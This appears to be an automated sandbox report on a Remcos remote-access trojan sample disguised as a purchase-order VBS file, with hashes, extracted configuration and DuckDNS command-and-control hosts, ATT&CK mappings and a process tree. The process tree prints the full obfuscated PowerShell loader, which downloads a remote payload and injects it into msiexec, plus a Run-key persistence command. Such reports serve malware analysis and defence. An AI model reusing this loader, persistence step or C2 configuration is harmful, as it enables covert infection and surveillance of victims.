remcos | 06d4a6631cc392070dc01e7bc97e333bd61af14ecf60bfc492e2a585f56daa22

General

Target

doc02122024782020031808174KR1802122024_po_doc_00000(991KB).vbs
Size

28KB
MD5

3f1b162cde8a052e2743f254ad97c590
SHA1

8263313c9ed96a36a57d67dfb72fa9729a2e792b
SHA256

06d4a6631cc392070dc01e7bc97e333bd61af14ecf60bfc492e2a585f56daa22
SHA512

447eb019fb70be017ad0fe0f1c88a467fd02ebac9647ac12a0dcd2ef8ddea223e6a3bf9e3c395d88839926638f6a0d8cce547bdf6a8a4b4349260c85c22e8416
SSDEEP

384:M5cVCJUAGNvubdgdgrBRUmngkIgjpFsQF9Oq1ymBRhdzsxPc0+:M5cXLNvuby2LUmngzgjpimOq1dQxA

Score

10^/10

remcos a$ian discovery persistence rat

Malware Config

Extracted

Family

remcos

Botnet

A$ian

C2

iwarsut775laudryed1.duckdns.org:57484

iwarsut775laudryed1.duckdns.org:57483

iwarsut775laudryed2.duckdns.org:57484

iwarsut775laudryed3.duckdns.org:57484

Attributes

audio_folder
MicRecords
audio_record_time
5
connect_delay
0
connect_interval
1
copy_file
remcos.exe
copy_folder
Remcos
delete_file
false
hide_file
false
hide_keylog_file
true
install_flag
false
keylog_crypt
false
keylog_file
hmbnspt.dat
keylog_flag
false
keylog_path
%AppData%
mouse_option
false
mutex
shibuetgtst-WMSLPY
screenshot_crypt
false
screenshot_flag
false
screenshot_folder
Screenshots
screenshot_path
%AppData%
screenshot_time
10
startup_value
take_screenshot_option
false
take_screenshot_time
5

Signatures

Remcos
Remcos is a closed-source remote control and surveillance software.
rat remcos
Remcos family
remcos

Blocklisted process makes network request 4 IoCs

flow	pid	Process
3	2380	WScript.exe
7	2688	powershell.exe
9	2540	msiexec.exe
11	2540	msiexec.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Windows\CurrentVersion\Run\Strudsmavers = "%Barcelona% -windowstyle 1 $Nedtllingen=(gp -Path 'HKCU:\\Software\\Firmity\\').Isbjergets;%Barcelona% ($Nedtllingen)"	reg.exe

Network Service Discovery 1 TTPs 2 IoCs

Attempt to gather information on host's network.

discovery

Network Service Discovery

T1046

pid	Process
2688	powershell.exe
1616	powershell.exe

Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs

pid	Process
2540	msiexec.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs

pid	Process
1616	powershell.exe
2540	msiexec.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 4 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	msiexec.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe

Modifies registry key 1 TTPs 1 IoCs

Modify Registry

T1112

pid	Process
2280	reg.exe

Suspicious behavior: EnumeratesProcesses 3 IoCs

pid	Process
2688	powershell.exe
1616	powershell.exe
1616	powershell.exe

Suspicious behavior: MapViewOfSection 1 IoCs

pid	Process
1616	powershell.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	2688	powershell.exe
Token: SeDebugPrivilege	1616	powershell.exe

Suspicious use of WriteProcessMemory 19 IoCs

description	pid	Process	procid_target
PID 2380 wrote to memory of 2688	2380	WScript.exe	30
PID 2380 wrote to memory of 2688	2380	WScript.exe	30
PID 2380 wrote to memory of 2688	2380	WScript.exe	30
PID 1616 wrote to memory of 2540	1616	powershell.exe	35
PID 1616 wrote to memory of 2540	1616	powershell.exe	35
PID 1616 wrote to memory of 2540	1616	powershell.exe	35
PID 1616 wrote to memory of 2540	1616	powershell.exe	35
PID 1616 wrote to memory of 2540	1616	powershell.exe	35
PID 1616 wrote to memory of 2540	1616	powershell.exe	35
PID 1616 wrote to memory of 2540	1616	powershell.exe	35
PID 1616 wrote to memory of 2540	1616	powershell.exe	35
PID 2540 wrote to memory of 1408	2540	msiexec.exe	36
PID 2540 wrote to memory of 1408	2540	msiexec.exe	36
PID 2540 wrote to memory of 1408	2540	msiexec.exe	36
PID 2540 wrote to memory of 1408	2540	msiexec.exe	36
PID 1408 wrote to memory of 2280	1408	cmd.exe	38
PID 1408 wrote to memory of 2280	1408	cmd.exe	38
PID 1408 wrote to memory of 2280	1408	cmd.exe	38
PID 1408 wrote to memory of 2280	1408	cmd.exe	38

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\doc02122024782020031808174KR1802122024_po_doc_00000(991KB).vbs"
1⤵
- Blocklisted process makes network request
- Suspicious use of WriteProcessMemory
PID:2380
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ";$Upbuild='Termometrisk';;$Litteraer='ridtenes';;$Huggedes='Boghvedegrynet';;$Eliger='Idolastre';;$Warps=$host.Name;function Pickover($Receded){If ($Warps) {$Uddelegeringernes=5} for ($Stuearrester=$Uddelegeringernes;;$Stuearrester+=6){if(!$Receded[$Stuearrester]) { break };$melitas+=$Receded[$Stuearrester];$Fordum='Philatelists'}$melitas}function Semra($clamatory){ .($Tsningens229) ($clamatory)}$Karakterfastes=Pickover ' Sko.N tus EUdko,T.lzev.Bi lew';$Karakterfastes+=Pickover 'Sor iEShellBfeje CCyprilUnderi moneeInqu.n DasyT';$Legegades149=Pickover 'Etat MIronboIldrazverdeiUnl,clMemenlDemera orte/';$opgavesamlingens=Pickover 'RefleTGrainlunders Di l1Overs2';$Nonemphatic='Shedm[Cumarn itulEOpma.tBasid. TranSE hjoePaaterNur avcop aiUnmanC SelveFran,PAyudaO ,njeImartiNForret SpalmUnadma R neN Ove AElfmugSa meeFo,riRMu.ro] aars:Inqui:UddelS SyslESkid,CHaid.UEuropRNagaii VandTOpdraYPrevePCadweRHemopo Fa.kTSiphoO etacResulo F.rlLLands=Klima$Chec.OJazzbpUnfouGMallaADavidVStoreeLiqu SFjerdAAmb.sMHandlLbrobaiPouldn Ex eg,mbroeSub.eNLoss S';$Legegades149+=Pickover 'Kajpl5 P.ac.ant n0Erhve tr he( esoWoversiHok,un Forud ,ospoWienewOverfsKomm, UvuloN KalcTLdrep Spach1Unp e0Indta. Eiri0ha,rd;Thal EpaulW ForbiUnicanni,ku6 Timg4Alamo;Stili ActinxHypoc6 Thor4Nazar;Mouto SchmarunthwvExpat:trill1terpe3ur em1Spots.Optag0Ana r)Repre omiG Em ee A ktcSnapskH gumoH mme/Manic2P.odd0capp 1Reint0Gysel0Loxod1 Mana0Fossi1Mysti UdskeFlabyriBrudar UndueErektf sello efamxCockn/ Afsp1Jebat3Jeaab1k,ken.Klikk0';$Underklasse=Pickover ' ,ediUChurcST.aisE Tri R tr.l- abenaOle,ngexscuETmmern U lst';$Interassociate111=Pickover ' Sndeh Litet PynttErri p F.jlsResc.: Fdse/a ien/Rebu gGeninaTr,ubrInddeh rabaoLovovuIsengdMisopjAchenoUnscouUnfrarSilvemLaane.FandacAfreno forgmInti /surm KHldekeRedeby Tran1 Stor.GaspipJ,rrynprea,gGirin>TambuhOver.tplositHalshpForsisUnpar:Plura/Yvern/Flyveg TofraOplrirHldeshP rfuoEksp uSlgsudHe.erjInfluo KnapuKridtrBlaammKur uoSmertn EfteeRddel.Tak.dcFor,doSkrddmkenel/ DrifK eeshe Forlyme ap1Tsume.WitjapPedo nBaggrg';$Stred=Pickover ' Brnd>';$Tsningens229=Pickover 'OryssIMahzoEStrejX';$Kejsersnit235='Tragicly';$Pubbens='\Glacialtid.Ses';Semra (Pickover ' Stim$ GuesGDobbwlLe teOEl,ndBEdomia UnfrLUnben:Le svTPre tIElopelCultifO.dfoLCorsayuklogT,iplonDryssiGu dtnSmmo.gCostuEDdsdrrKerneS opde= Poli$P,side FormnCalumvIrrat:WangaaRetu,p,nkekpVul,aDHasseaSpeaktUdtola,ordv+bismu$ A buppopp UBedu bSubteBSpildECerylnHje ts');Semra (Pickover ' Elec$AdresGflyboLOmkomO MarrB RolaAMor ilAnt h:Hieroh DoppOParanmAnchooGavagnP,equUstrawcBefstL paedeWelteA micrrHeavy=Tr ke$OplgnIBimanN .ibet ummae Afsvr Varea N tisVi,ers ummeoVib aCUnquoI lectABoli.tNatalef.tes1Dingo1 anuk1 Cata. I dgsEmbarP SubdlIneliiPowniTMel n(Knoen$SagsaSskuretUdskrRNecroEBi.chDTrold)');Semra (Pickover $Nonemphatic);$Interassociate111=$Homonuclear[0];$ajlen=(Pickover 'Bi pe$BallaGTvineLMenn ODeltiBK okuA.mnitlDiplo:KleskRNonc ENesogKOs ilL vaasa lagtMBe rveBa.samDe okSOverrS Hic IGe,brg ntip1 Ddsb3Papis7vider=SynkrNOpe hECheekW,apan-SjaskoAandsbZonitJ tveEBlis,cNinictJordv NewfaS S eeyskovlSAlantTProbaESubstM.ljma.Certi$TinglKRede A co.nrHerboAAir hkSki stConusEKo.poRDiakrfOlit,asprinsPeripTProstechiffS');Semra ($ajlen);Semra (Pickover ' pol,$MutedRComprePuddekUnbrelSup aa A temBoghaeTehanm decksBentis Whe iFyri,gPrahu1 Meso3 L.mp7Terra.Maho,HReseceMetemaEncrid .obbeSyntar lassCe,eb[M tte$Bru tUKollanNons,dS.agse Be,vrJaquek akelStofpaSlutss ResesAutope Male]P.ehe=Ps ch$ TigeLUnp oeRel pgLaticeNatbogUdpinaMousedAur.se xocosOnoma1Antim4 ube9');$Consonantness=Pickover 'Misha$ HaanRDe,ome Res kBravel Par,aUndermBiproeResismcaus sBack s eedli OffigS rai1Doras3 Wa t7Udl n.HaglbD CarboDaggewSystenInkb lDambroSamk,aSlaugd ramFL.theiformulOv rseFe sk(Upass$Aflo.I skadnP ugutSp aeeBulldr eaca racs gudesSangsoC,mpicSval iPar.maPajamtfor veO.fic1,ngil1Pa ms1 Nonr,Spgel$HomeoSFirdoagtzplkAgramsTovr eDetrasHematp N geaPhlebrOverskBewite ,ilmtT les3Dagse4T lsv)';$Saksesparket34=$Tilflytningers;Semra (Pickover 'Un ns$ UdtaGFempelOutspOAdjudBBronzA,nstrl.itup: RelaPStroguFi.moRMeagevKonceE.lposyDesse=Potla(RenonTRedivENonmaSS lvstKaesk-Ge tip ,ockADecylt itwohHusbl Komme$u,eldsHj mlAProfekEn ersKen teRid.es StrepBim laEmaljRVowelkM lieEwe,nlTM ter3 defi4Ba,ta)');while (!$Purvey) {Semra (Pickover 'Pan l$nonp,gUnballMuld.o AfvrbcricoaSekunlKalci:oprinG.arageFo osnDdelinShilleIb remAutopl.ncatyEtym sNaturn uberi ChemnSkamfgUdkrae Pseun.insas Over= Re b$SkulpAC.nfefGreevtLaanevLineatHunchnPyramiTrumfnstyrvg KdebePhotor rekln.addee') ;Semra $Consonantness;Semra (Pickover 'ModulsEksisTTude a efutROutbrtSquir-Ro anSdinoplGnavpeduemoESubcepNr st Cov.4');Semra (Pickover 'Wigg $ EterGR synL BorgO P rlbBetr.ALymphLD.rze: AuguPSkjoluMi,ikRDiverVshi,teItineyFre m=Masse( tut t DiffE,axidS .nnettidde- juleP PoinA albot Ha rHSkole L el$Bygevs JubeAtitlekTurris MarsEB nziS alacp irgiaNellir S.uikMinuseVanddtPrate3unenj4Tandy)') ;Semra (Pickover ' gnin$ForklGOv,rel CommoUdmaabVdet.A rampl An p:E,pirbGryrkADopinACou tdGesjfEEpigoHIn eraOwsenVSurconVingeSparon=Frea $UnpergRemnflJo dsOSlam bKontraBeskrLMilio: KonvKbonnwuLyne nYer tsGastot omplMClinoA llusLreache GuerRFunktePremenAucheSPret,+ stic+ gamo%Smask$ Na lH U,grOjetmomT dspo SmitnGaudeU DelacSubcolCe leePredeA A,toR Inte.SleepcLykk,oAgterU St.nnPari.t') ;$Interassociate111=$Homonuclear[$Baadehavns]}$Onaner=289582;$Nedstreg=31752;Semra (Pickover 'Succe$UttergUnposlRegnsOMatteB NonsaPeturlLarge:DiuremmessiyBel sRForblIRat rC HypoaM,yers.ostb Athei=Trist T.rnigM nkseWil.ltproje-CroisCStudeO PastnplaniTSecsre omern HvesTAfslu Remin$remiss SkenaSwipeKBanegSAttenE OplysSkatePDisenAGrindRCyanuk DeflE Sak tSel k3zestf4');Semra (Pickover 'Co la$his og CabblCompaopathob OveraMidlal.ever:Hija IBrugemKalifmKun taHeternScenee ocianFi kec ElefeAnako1Dy ph3Arnab7,hara i.dis=Skrmt Slave[PuggaSRerumy T.ucsOveretGyneceReaktm Dipn. O,isCFox hoOdifenDejlivRi gkeFeltarItacit Tros]Dippe:Hemih: Cap F SocirT rryoforkym SyndBProscaDummesElekte abar6Renny4RecipSEffert.asrerartisi pisnapoqug Invo(.istr$OverbM s inyRoularDanneiAntiec BeniaA riesDelkr)');Semra (Pickover 'Anden$RanglgStranLSawhooQualiBBlaykaUnd.sLDefau:Pela TCyanirki,niFRefleNK.rociWishenWellhg,nflaEFjerpr LevnnNikkeETilpasPremu Unine=Vende Dicyc[Sk,ttSOscilY H peS S ovtScorieHal,bmComme.Tanket.nockESennex,emont.acho. DmtiEFermanE iasc EyedOSkrteDUfolkIUpstaNKostugSw nd]Blimp: akti:UngenAco.esSMilksCBedsoiGrav ID.eng. g utGM,sune IrlatLaxats,artnTorganRVedliI LserNF.agtg Spig(Salna$opslaIJa goMYd.rgMElendA CardNRimelEOverlNO ersC R spEBehan1Tilsy3Refin7Mikro)');Semra (Pickover 'Unad.$Led rGidri LAfs yO ontobPositAIro iLUdlad:MagerLAncese OutdVSk,lnIste ttUdloeyDever=Kterr$ Ele.tMa.herVeneyfDest NRhombI CandnMull GEdiyaeAtropRLilesN .hroEKvletsKomma.DynenSSowtbUCa,elb SpheS ,looTSpri.rNonaiIr kogNSammeGUnder(Efter$Nre dOBeskinBa kka FrasnLagopeFestrRUninf,Stjer$Ter anDischeGrnttD RumssAnettTcalycr untoEAf eaGKadmi)');Semra $Levity;"
  2⤵
  - Blocklisted process makes network request
  - Network Service Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2688

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" ";$Upbuild='Termometrisk';;$Litteraer='ridtenes';;$Huggedes='Boghvedegrynet';;$Eliger='Idolastre';;$Warps=$host.Name;function Pickover($Receded){If ($Warps) {$Uddelegeringernes=5} for ($Stuearrester=$Uddelegeringernes;;$Stuearrester+=6){if(!$Receded[$Stuearrester]) { break };$melitas+=$Receded[$Stuearrester];$Fordum='Philatelists'}$melitas}function Semra($clamatory){ .($Tsningens229) ($clamatory)}$Karakterfastes=Pickover ' Sko.N tus EUdko,T.lzev.Bi lew';$Karakterfastes+=Pickover 'Sor iEShellBfeje CCyprilUnderi moneeInqu.n DasyT';$Legegades149=Pickover 'Etat MIronboIldrazverdeiUnl,clMemenlDemera orte/';$opgavesamlingens=Pickover 'RefleTGrainlunders Di l1Overs2';$Nonemphatic='Shedm[Cumarn itulEOpma.tBasid. TranSE hjoePaaterNur avcop aiUnmanC SelveFran,PAyudaO ,njeImartiNForret SpalmUnadma R neN Ove AElfmugSa meeFo,riRMu.ro] aars:Inqui:UddelS SyslESkid,CHaid.UEuropRNagaii VandTOpdraYPrevePCadweRHemopo Fa.kTSiphoO etacResulo F.rlLLands=Klima$Chec.OJazzbpUnfouGMallaADavidVStoreeLiqu SFjerdAAmb.sMHandlLbrobaiPouldn Ex eg,mbroeSub.eNLoss S';$Legegades149+=Pickover 'Kajpl5 P.ac.ant n0Erhve tr he( esoWoversiHok,un Forud ,ospoWienewOverfsKomm, UvuloN KalcTLdrep Spach1Unp e0Indta. Eiri0ha,rd;Thal EpaulW ForbiUnicanni,ku6 Timg4Alamo;Stili ActinxHypoc6 Thor4Nazar;Mouto SchmarunthwvExpat:trill1terpe3ur em1Spots.Optag0Ana r)Repre omiG Em ee A ktcSnapskH gumoH mme/Manic2P.odd0capp 1Reint0Gysel0Loxod1 Mana0Fossi1Mysti UdskeFlabyriBrudar UndueErektf sello efamxCockn/ Afsp1Jebat3Jeaab1k,ken.Klikk0';$Underklasse=Pickover ' ,ediUChurcST.aisE Tri R tr.l- abenaOle,ngexscuETmmern U lst';$Interassociate111=Pickover ' Sndeh Litet PynttErri p F.jlsResc.: Fdse/a ien/Rebu gGeninaTr,ubrInddeh rabaoLovovuIsengdMisopjAchenoUnscouUnfrarSilvemLaane.FandacAfreno forgmInti /surm KHldekeRedeby Tran1 Stor.GaspipJ,rrynprea,gGirin>TambuhOver.tplositHalshpForsisUnpar:Plura/Yvern/Flyveg TofraOplrirHldeshP rfuoEksp uSlgsudHe.erjInfluo KnapuKridtrBlaammKur uoSmertn EfteeRddel.Tak.dcFor,doSkrddmkenel/ DrifK eeshe Forlyme ap1Tsume.WitjapPedo nBaggrg';$Stred=Pickover ' Brnd>';$Tsningens229=Pickover 'OryssIMahzoEStrejX';$Kejsersnit235='Tragicly';$Pubbens='\Glacialtid.Ses';Semra (Pickover ' Stim$ GuesGDobbwlLe teOEl,ndBEdomia UnfrLUnben:Le svTPre tIElopelCultifO.dfoLCorsayuklogT,iplonDryssiGu dtnSmmo.gCostuEDdsdrrKerneS opde= Poli$P,side FormnCalumvIrrat:WangaaRetu,p,nkekpVul,aDHasseaSpeaktUdtola,ordv+bismu$ A buppopp UBedu bSubteBSpildECerylnHje ts');Semra (Pickover ' Elec$AdresGflyboLOmkomO MarrB RolaAMor ilAnt h:Hieroh DoppOParanmAnchooGavagnP,equUstrawcBefstL paedeWelteA micrrHeavy=Tr ke$OplgnIBimanN .ibet ummae Afsvr Varea N tisVi,ers ummeoVib aCUnquoI lectABoli.tNatalef.tes1Dingo1 anuk1 Cata. I dgsEmbarP SubdlIneliiPowniTMel n(Knoen$SagsaSskuretUdskrRNecroEBi.chDTrold)');Semra (Pickover $Nonemphatic);$Interassociate111=$Homonuclear[0];$ajlen=(Pickover 'Bi pe$BallaGTvineLMenn ODeltiBK okuA.mnitlDiplo:KleskRNonc ENesogKOs ilL vaasa lagtMBe rveBa.samDe okSOverrS Hic IGe,brg ntip1 Ddsb3Papis7vider=SynkrNOpe hECheekW,apan-SjaskoAandsbZonitJ tveEBlis,cNinictJordv NewfaS S eeyskovlSAlantTProbaESubstM.ljma.Certi$TinglKRede A co.nrHerboAAir hkSki stConusEKo.poRDiakrfOlit,asprinsPeripTProstechiffS');Semra ($ajlen);Semra (Pickover ' pol,$MutedRComprePuddekUnbrelSup aa A temBoghaeTehanm decksBentis Whe iFyri,gPrahu1 Meso3 L.mp7Terra.Maho,HReseceMetemaEncrid .obbeSyntar lassCe,eb[M tte$Bru tUKollanNons,dS.agse Be,vrJaquek akelStofpaSlutss ResesAutope Male]P.ehe=Ps ch$ TigeLUnp oeRel pgLaticeNatbogUdpinaMousedAur.se xocosOnoma1Antim4 ube9');$Consonantness=Pickover 'Misha$ HaanRDe,ome Res kBravel Par,aUndermBiproeResismcaus sBack s eedli OffigS rai1Doras3 Wa t7Udl n.HaglbD CarboDaggewSystenInkb lDambroSamk,aSlaugd ramFL.theiformulOv rseFe sk(Upass$Aflo.I skadnP ugutSp aeeBulldr eaca racs gudesSangsoC,mpicSval iPar.maPajamtfor veO.fic1,ngil1Pa ms1 Nonr,Spgel$HomeoSFirdoagtzplkAgramsTovr eDetrasHematp N geaPhlebrOverskBewite ,ilmtT les3Dagse4T lsv)';$Saksesparket34=$Tilflytningers;Semra (Pickover 'Un ns$ UdtaGFempelOutspOAdjudBBronzA,nstrl.itup: RelaPStroguFi.moRMeagevKonceE.lposyDesse=Potla(RenonTRedivENonmaSS lvstKaesk-Ge tip ,ockADecylt itwohHusbl Komme$u,eldsHj mlAProfekEn ersKen teRid.es StrepBim laEmaljRVowelkM lieEwe,nlTM ter3 defi4Ba,ta)');while (!$Purvey) {Semra (Pickover 'Pan l$nonp,gUnballMuld.o AfvrbcricoaSekunlKalci:oprinG.arageFo osnDdelinShilleIb remAutopl.ncatyEtym sNaturn uberi ChemnSkamfgUdkrae Pseun.insas Over= Re b$SkulpAC.nfefGreevtLaanevLineatHunchnPyramiTrumfnstyrvg KdebePhotor rekln.addee') ;Semra $Consonantness;Semra (Pickover 'ModulsEksisTTude a efutROutbrtSquir-Ro anSdinoplGnavpeduemoESubcepNr st Cov.4');Semra (Pickover 'Wigg $ EterGR synL BorgO P rlbBetr.ALymphLD.rze: AuguPSkjoluMi,ikRDiverVshi,teItineyFre m=Masse( tut t DiffE,axidS .nnettidde- juleP PoinA albot Ha rHSkole L el$Bygevs JubeAtitlekTurris MarsEB nziS alacp irgiaNellir S.uikMinuseVanddtPrate3unenj4Tandy)') ;Semra (Pickover ' gnin$ForklGOv,rel CommoUdmaabVdet.A rampl An p:E,pirbGryrkADopinACou tdGesjfEEpigoHIn eraOwsenVSurconVingeSparon=Frea $UnpergRemnflJo dsOSlam bKontraBeskrLMilio: KonvKbonnwuLyne nYer tsGastot omplMClinoA llusLreache GuerRFunktePremenAucheSPret,+ stic+ gamo%Smask$ Na lH U,grOjetmomT dspo SmitnGaudeU DelacSubcolCe leePredeA A,toR Inte.SleepcLykk,oAgterU St.nnPari.t') ;$Interassociate111=$Homonuclear[$Baadehavns]}$Onaner=289582;$Nedstreg=31752;Semra (Pickover 'Succe$UttergUnposlRegnsOMatteB NonsaPeturlLarge:DiuremmessiyBel sRForblIRat rC HypoaM,yers.ostb Athei=Trist T.rnigM nkseWil.ltproje-CroisCStudeO PastnplaniTSecsre omern HvesTAfslu Remin$remiss SkenaSwipeKBanegSAttenE OplysSkatePDisenAGrindRCyanuk DeflE Sak tSel k3zestf4');Semra (Pickover 'Co la$his og CabblCompaopathob OveraMidlal.ever:Hija IBrugemKalifmKun taHeternScenee ocianFi kec ElefeAnako1Dy ph3Arnab7,hara i.dis=Skrmt Slave[PuggaSRerumy T.ucsOveretGyneceReaktm Dipn. O,isCFox hoOdifenDejlivRi gkeFeltarItacit Tros]Dippe:Hemih: Cap F SocirT rryoforkym SyndBProscaDummesElekte abar6Renny4RecipSEffert.asrerartisi pisnapoqug Invo(.istr$OverbM s inyRoularDanneiAntiec BeniaA riesDelkr)');Semra (Pickover 'Anden$RanglgStranLSawhooQualiBBlaykaUnd.sLDefau:Pela TCyanirki,niFRefleNK.rociWishenWellhg,nflaEFjerpr LevnnNikkeETilpasPremu Unine=Vende Dicyc[Sk,ttSOscilY H peS S ovtScorieHal,bmComme.Tanket.nockESennex,emont.acho. DmtiEFermanE iasc EyedOSkrteDUfolkIUpstaNKostugSw nd]Blimp: akti:UngenAco.esSMilksCBedsoiGrav ID.eng. g utGM,sune IrlatLaxats,artnTorganRVedliI LserNF.agtg Spig(Salna$opslaIJa goMYd.rgMElendA CardNRimelEOverlNO ersC R spEBehan1Tilsy3Refin7Mikro)');Semra (Pickover 'Unad.$Led rGidri LAfs yO ontobPositAIro iLUdlad:MagerLAncese OutdVSk,lnIste ttUdloeyDever=Kterr$ Ele.tMa.herVeneyfDest NRhombI CandnMull GEdiyaeAtropRLilesN .hroEKvletsKomma.DynenSSowtbUCa,elb SpheS ,looTSpri.rNonaiIr kogNSammeGUnder(Efter$Nre dOBeskinBa kka FrasnLagopeFestrRUninf,Stjer$Ter anDischeGrnttD RumssAnettTcalycr untoEAf eaGKadmi)');Semra $Levity;"
1⤵
- Network Service Discovery
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1616
- C:\Windows\SysWOW64\msiexec.exe
  "C:\Windows\SysWOW64\msiexec.exe"
  2⤵
  - Blocklisted process makes network request
  - Suspicious use of NtCreateThreadExHideFromDebugger
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:2540
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Strudsmavers" /t REG_EXPAND_SZ /d "%Barcelona% -windowstyle 1 $Nedtllingen=(gp -Path 'HKCU:\Software\Firmity\').Isbjergets;%Barcelona% ($Nedtllingen)"
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:1408
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Strudsmavers" /t REG_EXPAND_SZ /d "%Barcelona% -windowstyle 1 $Nedtllingen=(gp -Path 'HKCU:\Software\Firmity\').Isbjergets;%Barcelona% ($Nedtllingen)"
      4⤵
      Adds Run key to start application
      System Location Discovery: System Language Discovery
      Modifies registry key
      PID:2280

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Boot or Logon Autostart Execution

1

T1547

Registry Run Keys / Startup Folder

1

T1547.001

Privilege Escalation

Boot or Logon Autostart Execution

1

T1547

Registry Run Keys / Startup Folder

1

T1547.001

Defense Evasion

Modify Registry

2

T1112

Credential Access

Discovery

Network Service Discovery

1

T1046

System Information Discovery

1

T1082

System Location Discovery

1

T1614

System Language Discovery

1

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
28d4fbb18414c4043e8a4e7905e00bbd

SHA1
6b3bba990e517862c56dcceab064f49c46fc75f9

SHA256
f2c9f48546bb6e3a67d367560998be78d316e329b2724142d756d6579a12e1fa

SHA512
ddd4ccc1ebe9cd5e331024b9eb603e8b0de1a156616eacffcce9778c942b56d384a1e0d5bc9728c32e87568ac8ec41f9b04db632aa5295f596e95e2f1096f08f

Download Submit
C:\Users\Admin\AppData\Local\Temp\CabF4BD.tmp

Filesize
70KB

MD5
49aebf8cbd62d92ac215b2923fb1b9f5

SHA1
1723be06719828dda65ad804298d0431f6aff976

SHA256
b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f

SHA512
bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

Download Submit
C:\Users\Admin\AppData\Local\Temp\Tar6B13.tmp

Filesize
181KB

MD5
4ea6026cf93ec6338144661bf1202cd1

SHA1
a1dec9044f750ad887935a01430bf49322fbdcb7

SHA256
8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8

SHA512
6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b

Download Submit
C:\Users\Admin\AppData\Roaming\Glacialtid.Ses

Filesize
418KB

MD5
4cf5ac6122fae42909350e40fbdeb8eb

SHA1
777ad8c6bf8912116ad6ab9575356146374c9b21

SHA256
4da60ce98680daa52f0d9404e304adc4c0508fa429dd133eeba0976b3dc8dc89

SHA512
3a3891a6b1a89ee776816c0bed2329d1cf16b63beb9c1e63790a79672e91b1f4a4b00799e75d9342d017ec2a0a7d21ddd5a378444f24b48f7d0d12f92a0c55f2

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\L4GPDZ8NJUB0Y1CJPZ2S.temp

Filesize
7KB

MD5
1c7b90519f41b2b737474191b7478791

SHA1
931245cbd0439f039353c67d9ad866f8215129d0

SHA256
1a0106630b45184caafdc6be4380aca08c9e6c681896edb4068de6e568dd23a3

SHA512
2f3a397ee9401ccf590ce60c4751429dfe73fc1980a016dae366022c2048770124cdcb17c00e69653c4eb265433b9737f5fcf251de8c4adafd232b6c42c768bc

Download Submit
memory/1616-36-0x0000000006640000-0x0000000007A4C000-memory.dmp

Filesize
20.0MB

Download
memory/2540-57-0x0000000000800000-0x0000000001862000-memory.dmp

Filesize
16.4MB

Download
memory/2540-53-0x0000000000800000-0x0000000001862000-memory.dmp

Filesize
16.4MB

Download
memory/2688-21-0x000000001B6E0000-0x000000001B9C2000-memory.dmp

Filesize
2.9MB

Download
memory/2688-30-0x000007FEF547E000-0x000007FEF547F000-memory.dmp

Filesize
4KB

Download
memory/2688-31-0x000007FEF51C0000-0x000007FEF5B5D000-memory.dmp

Filesize
9.6MB

Download
memory/2688-32-0x000007FEF51C0000-0x000007FEF5B5D000-memory.dmp

Filesize
9.6MB

Download
memory/2688-26-0x000007FEF51C0000-0x000007FEF5B5D000-memory.dmp

Filesize
9.6MB

Download
memory/2688-27-0x000007FEF51C0000-0x000007FEF5B5D000-memory.dmp

Filesize
9.6MB

Download
memory/2688-25-0x000007FEF51C0000-0x000007FEF5B5D000-memory.dmp

Filesize
9.6MB

Download
memory/2688-24-0x000007FEF51C0000-0x000007FEF5B5D000-memory.dmp

Filesize
9.6MB

Download
memory/2688-22-0x0000000001F70000-0x0000000001F78000-memory.dmp

Filesize
32KB

Download
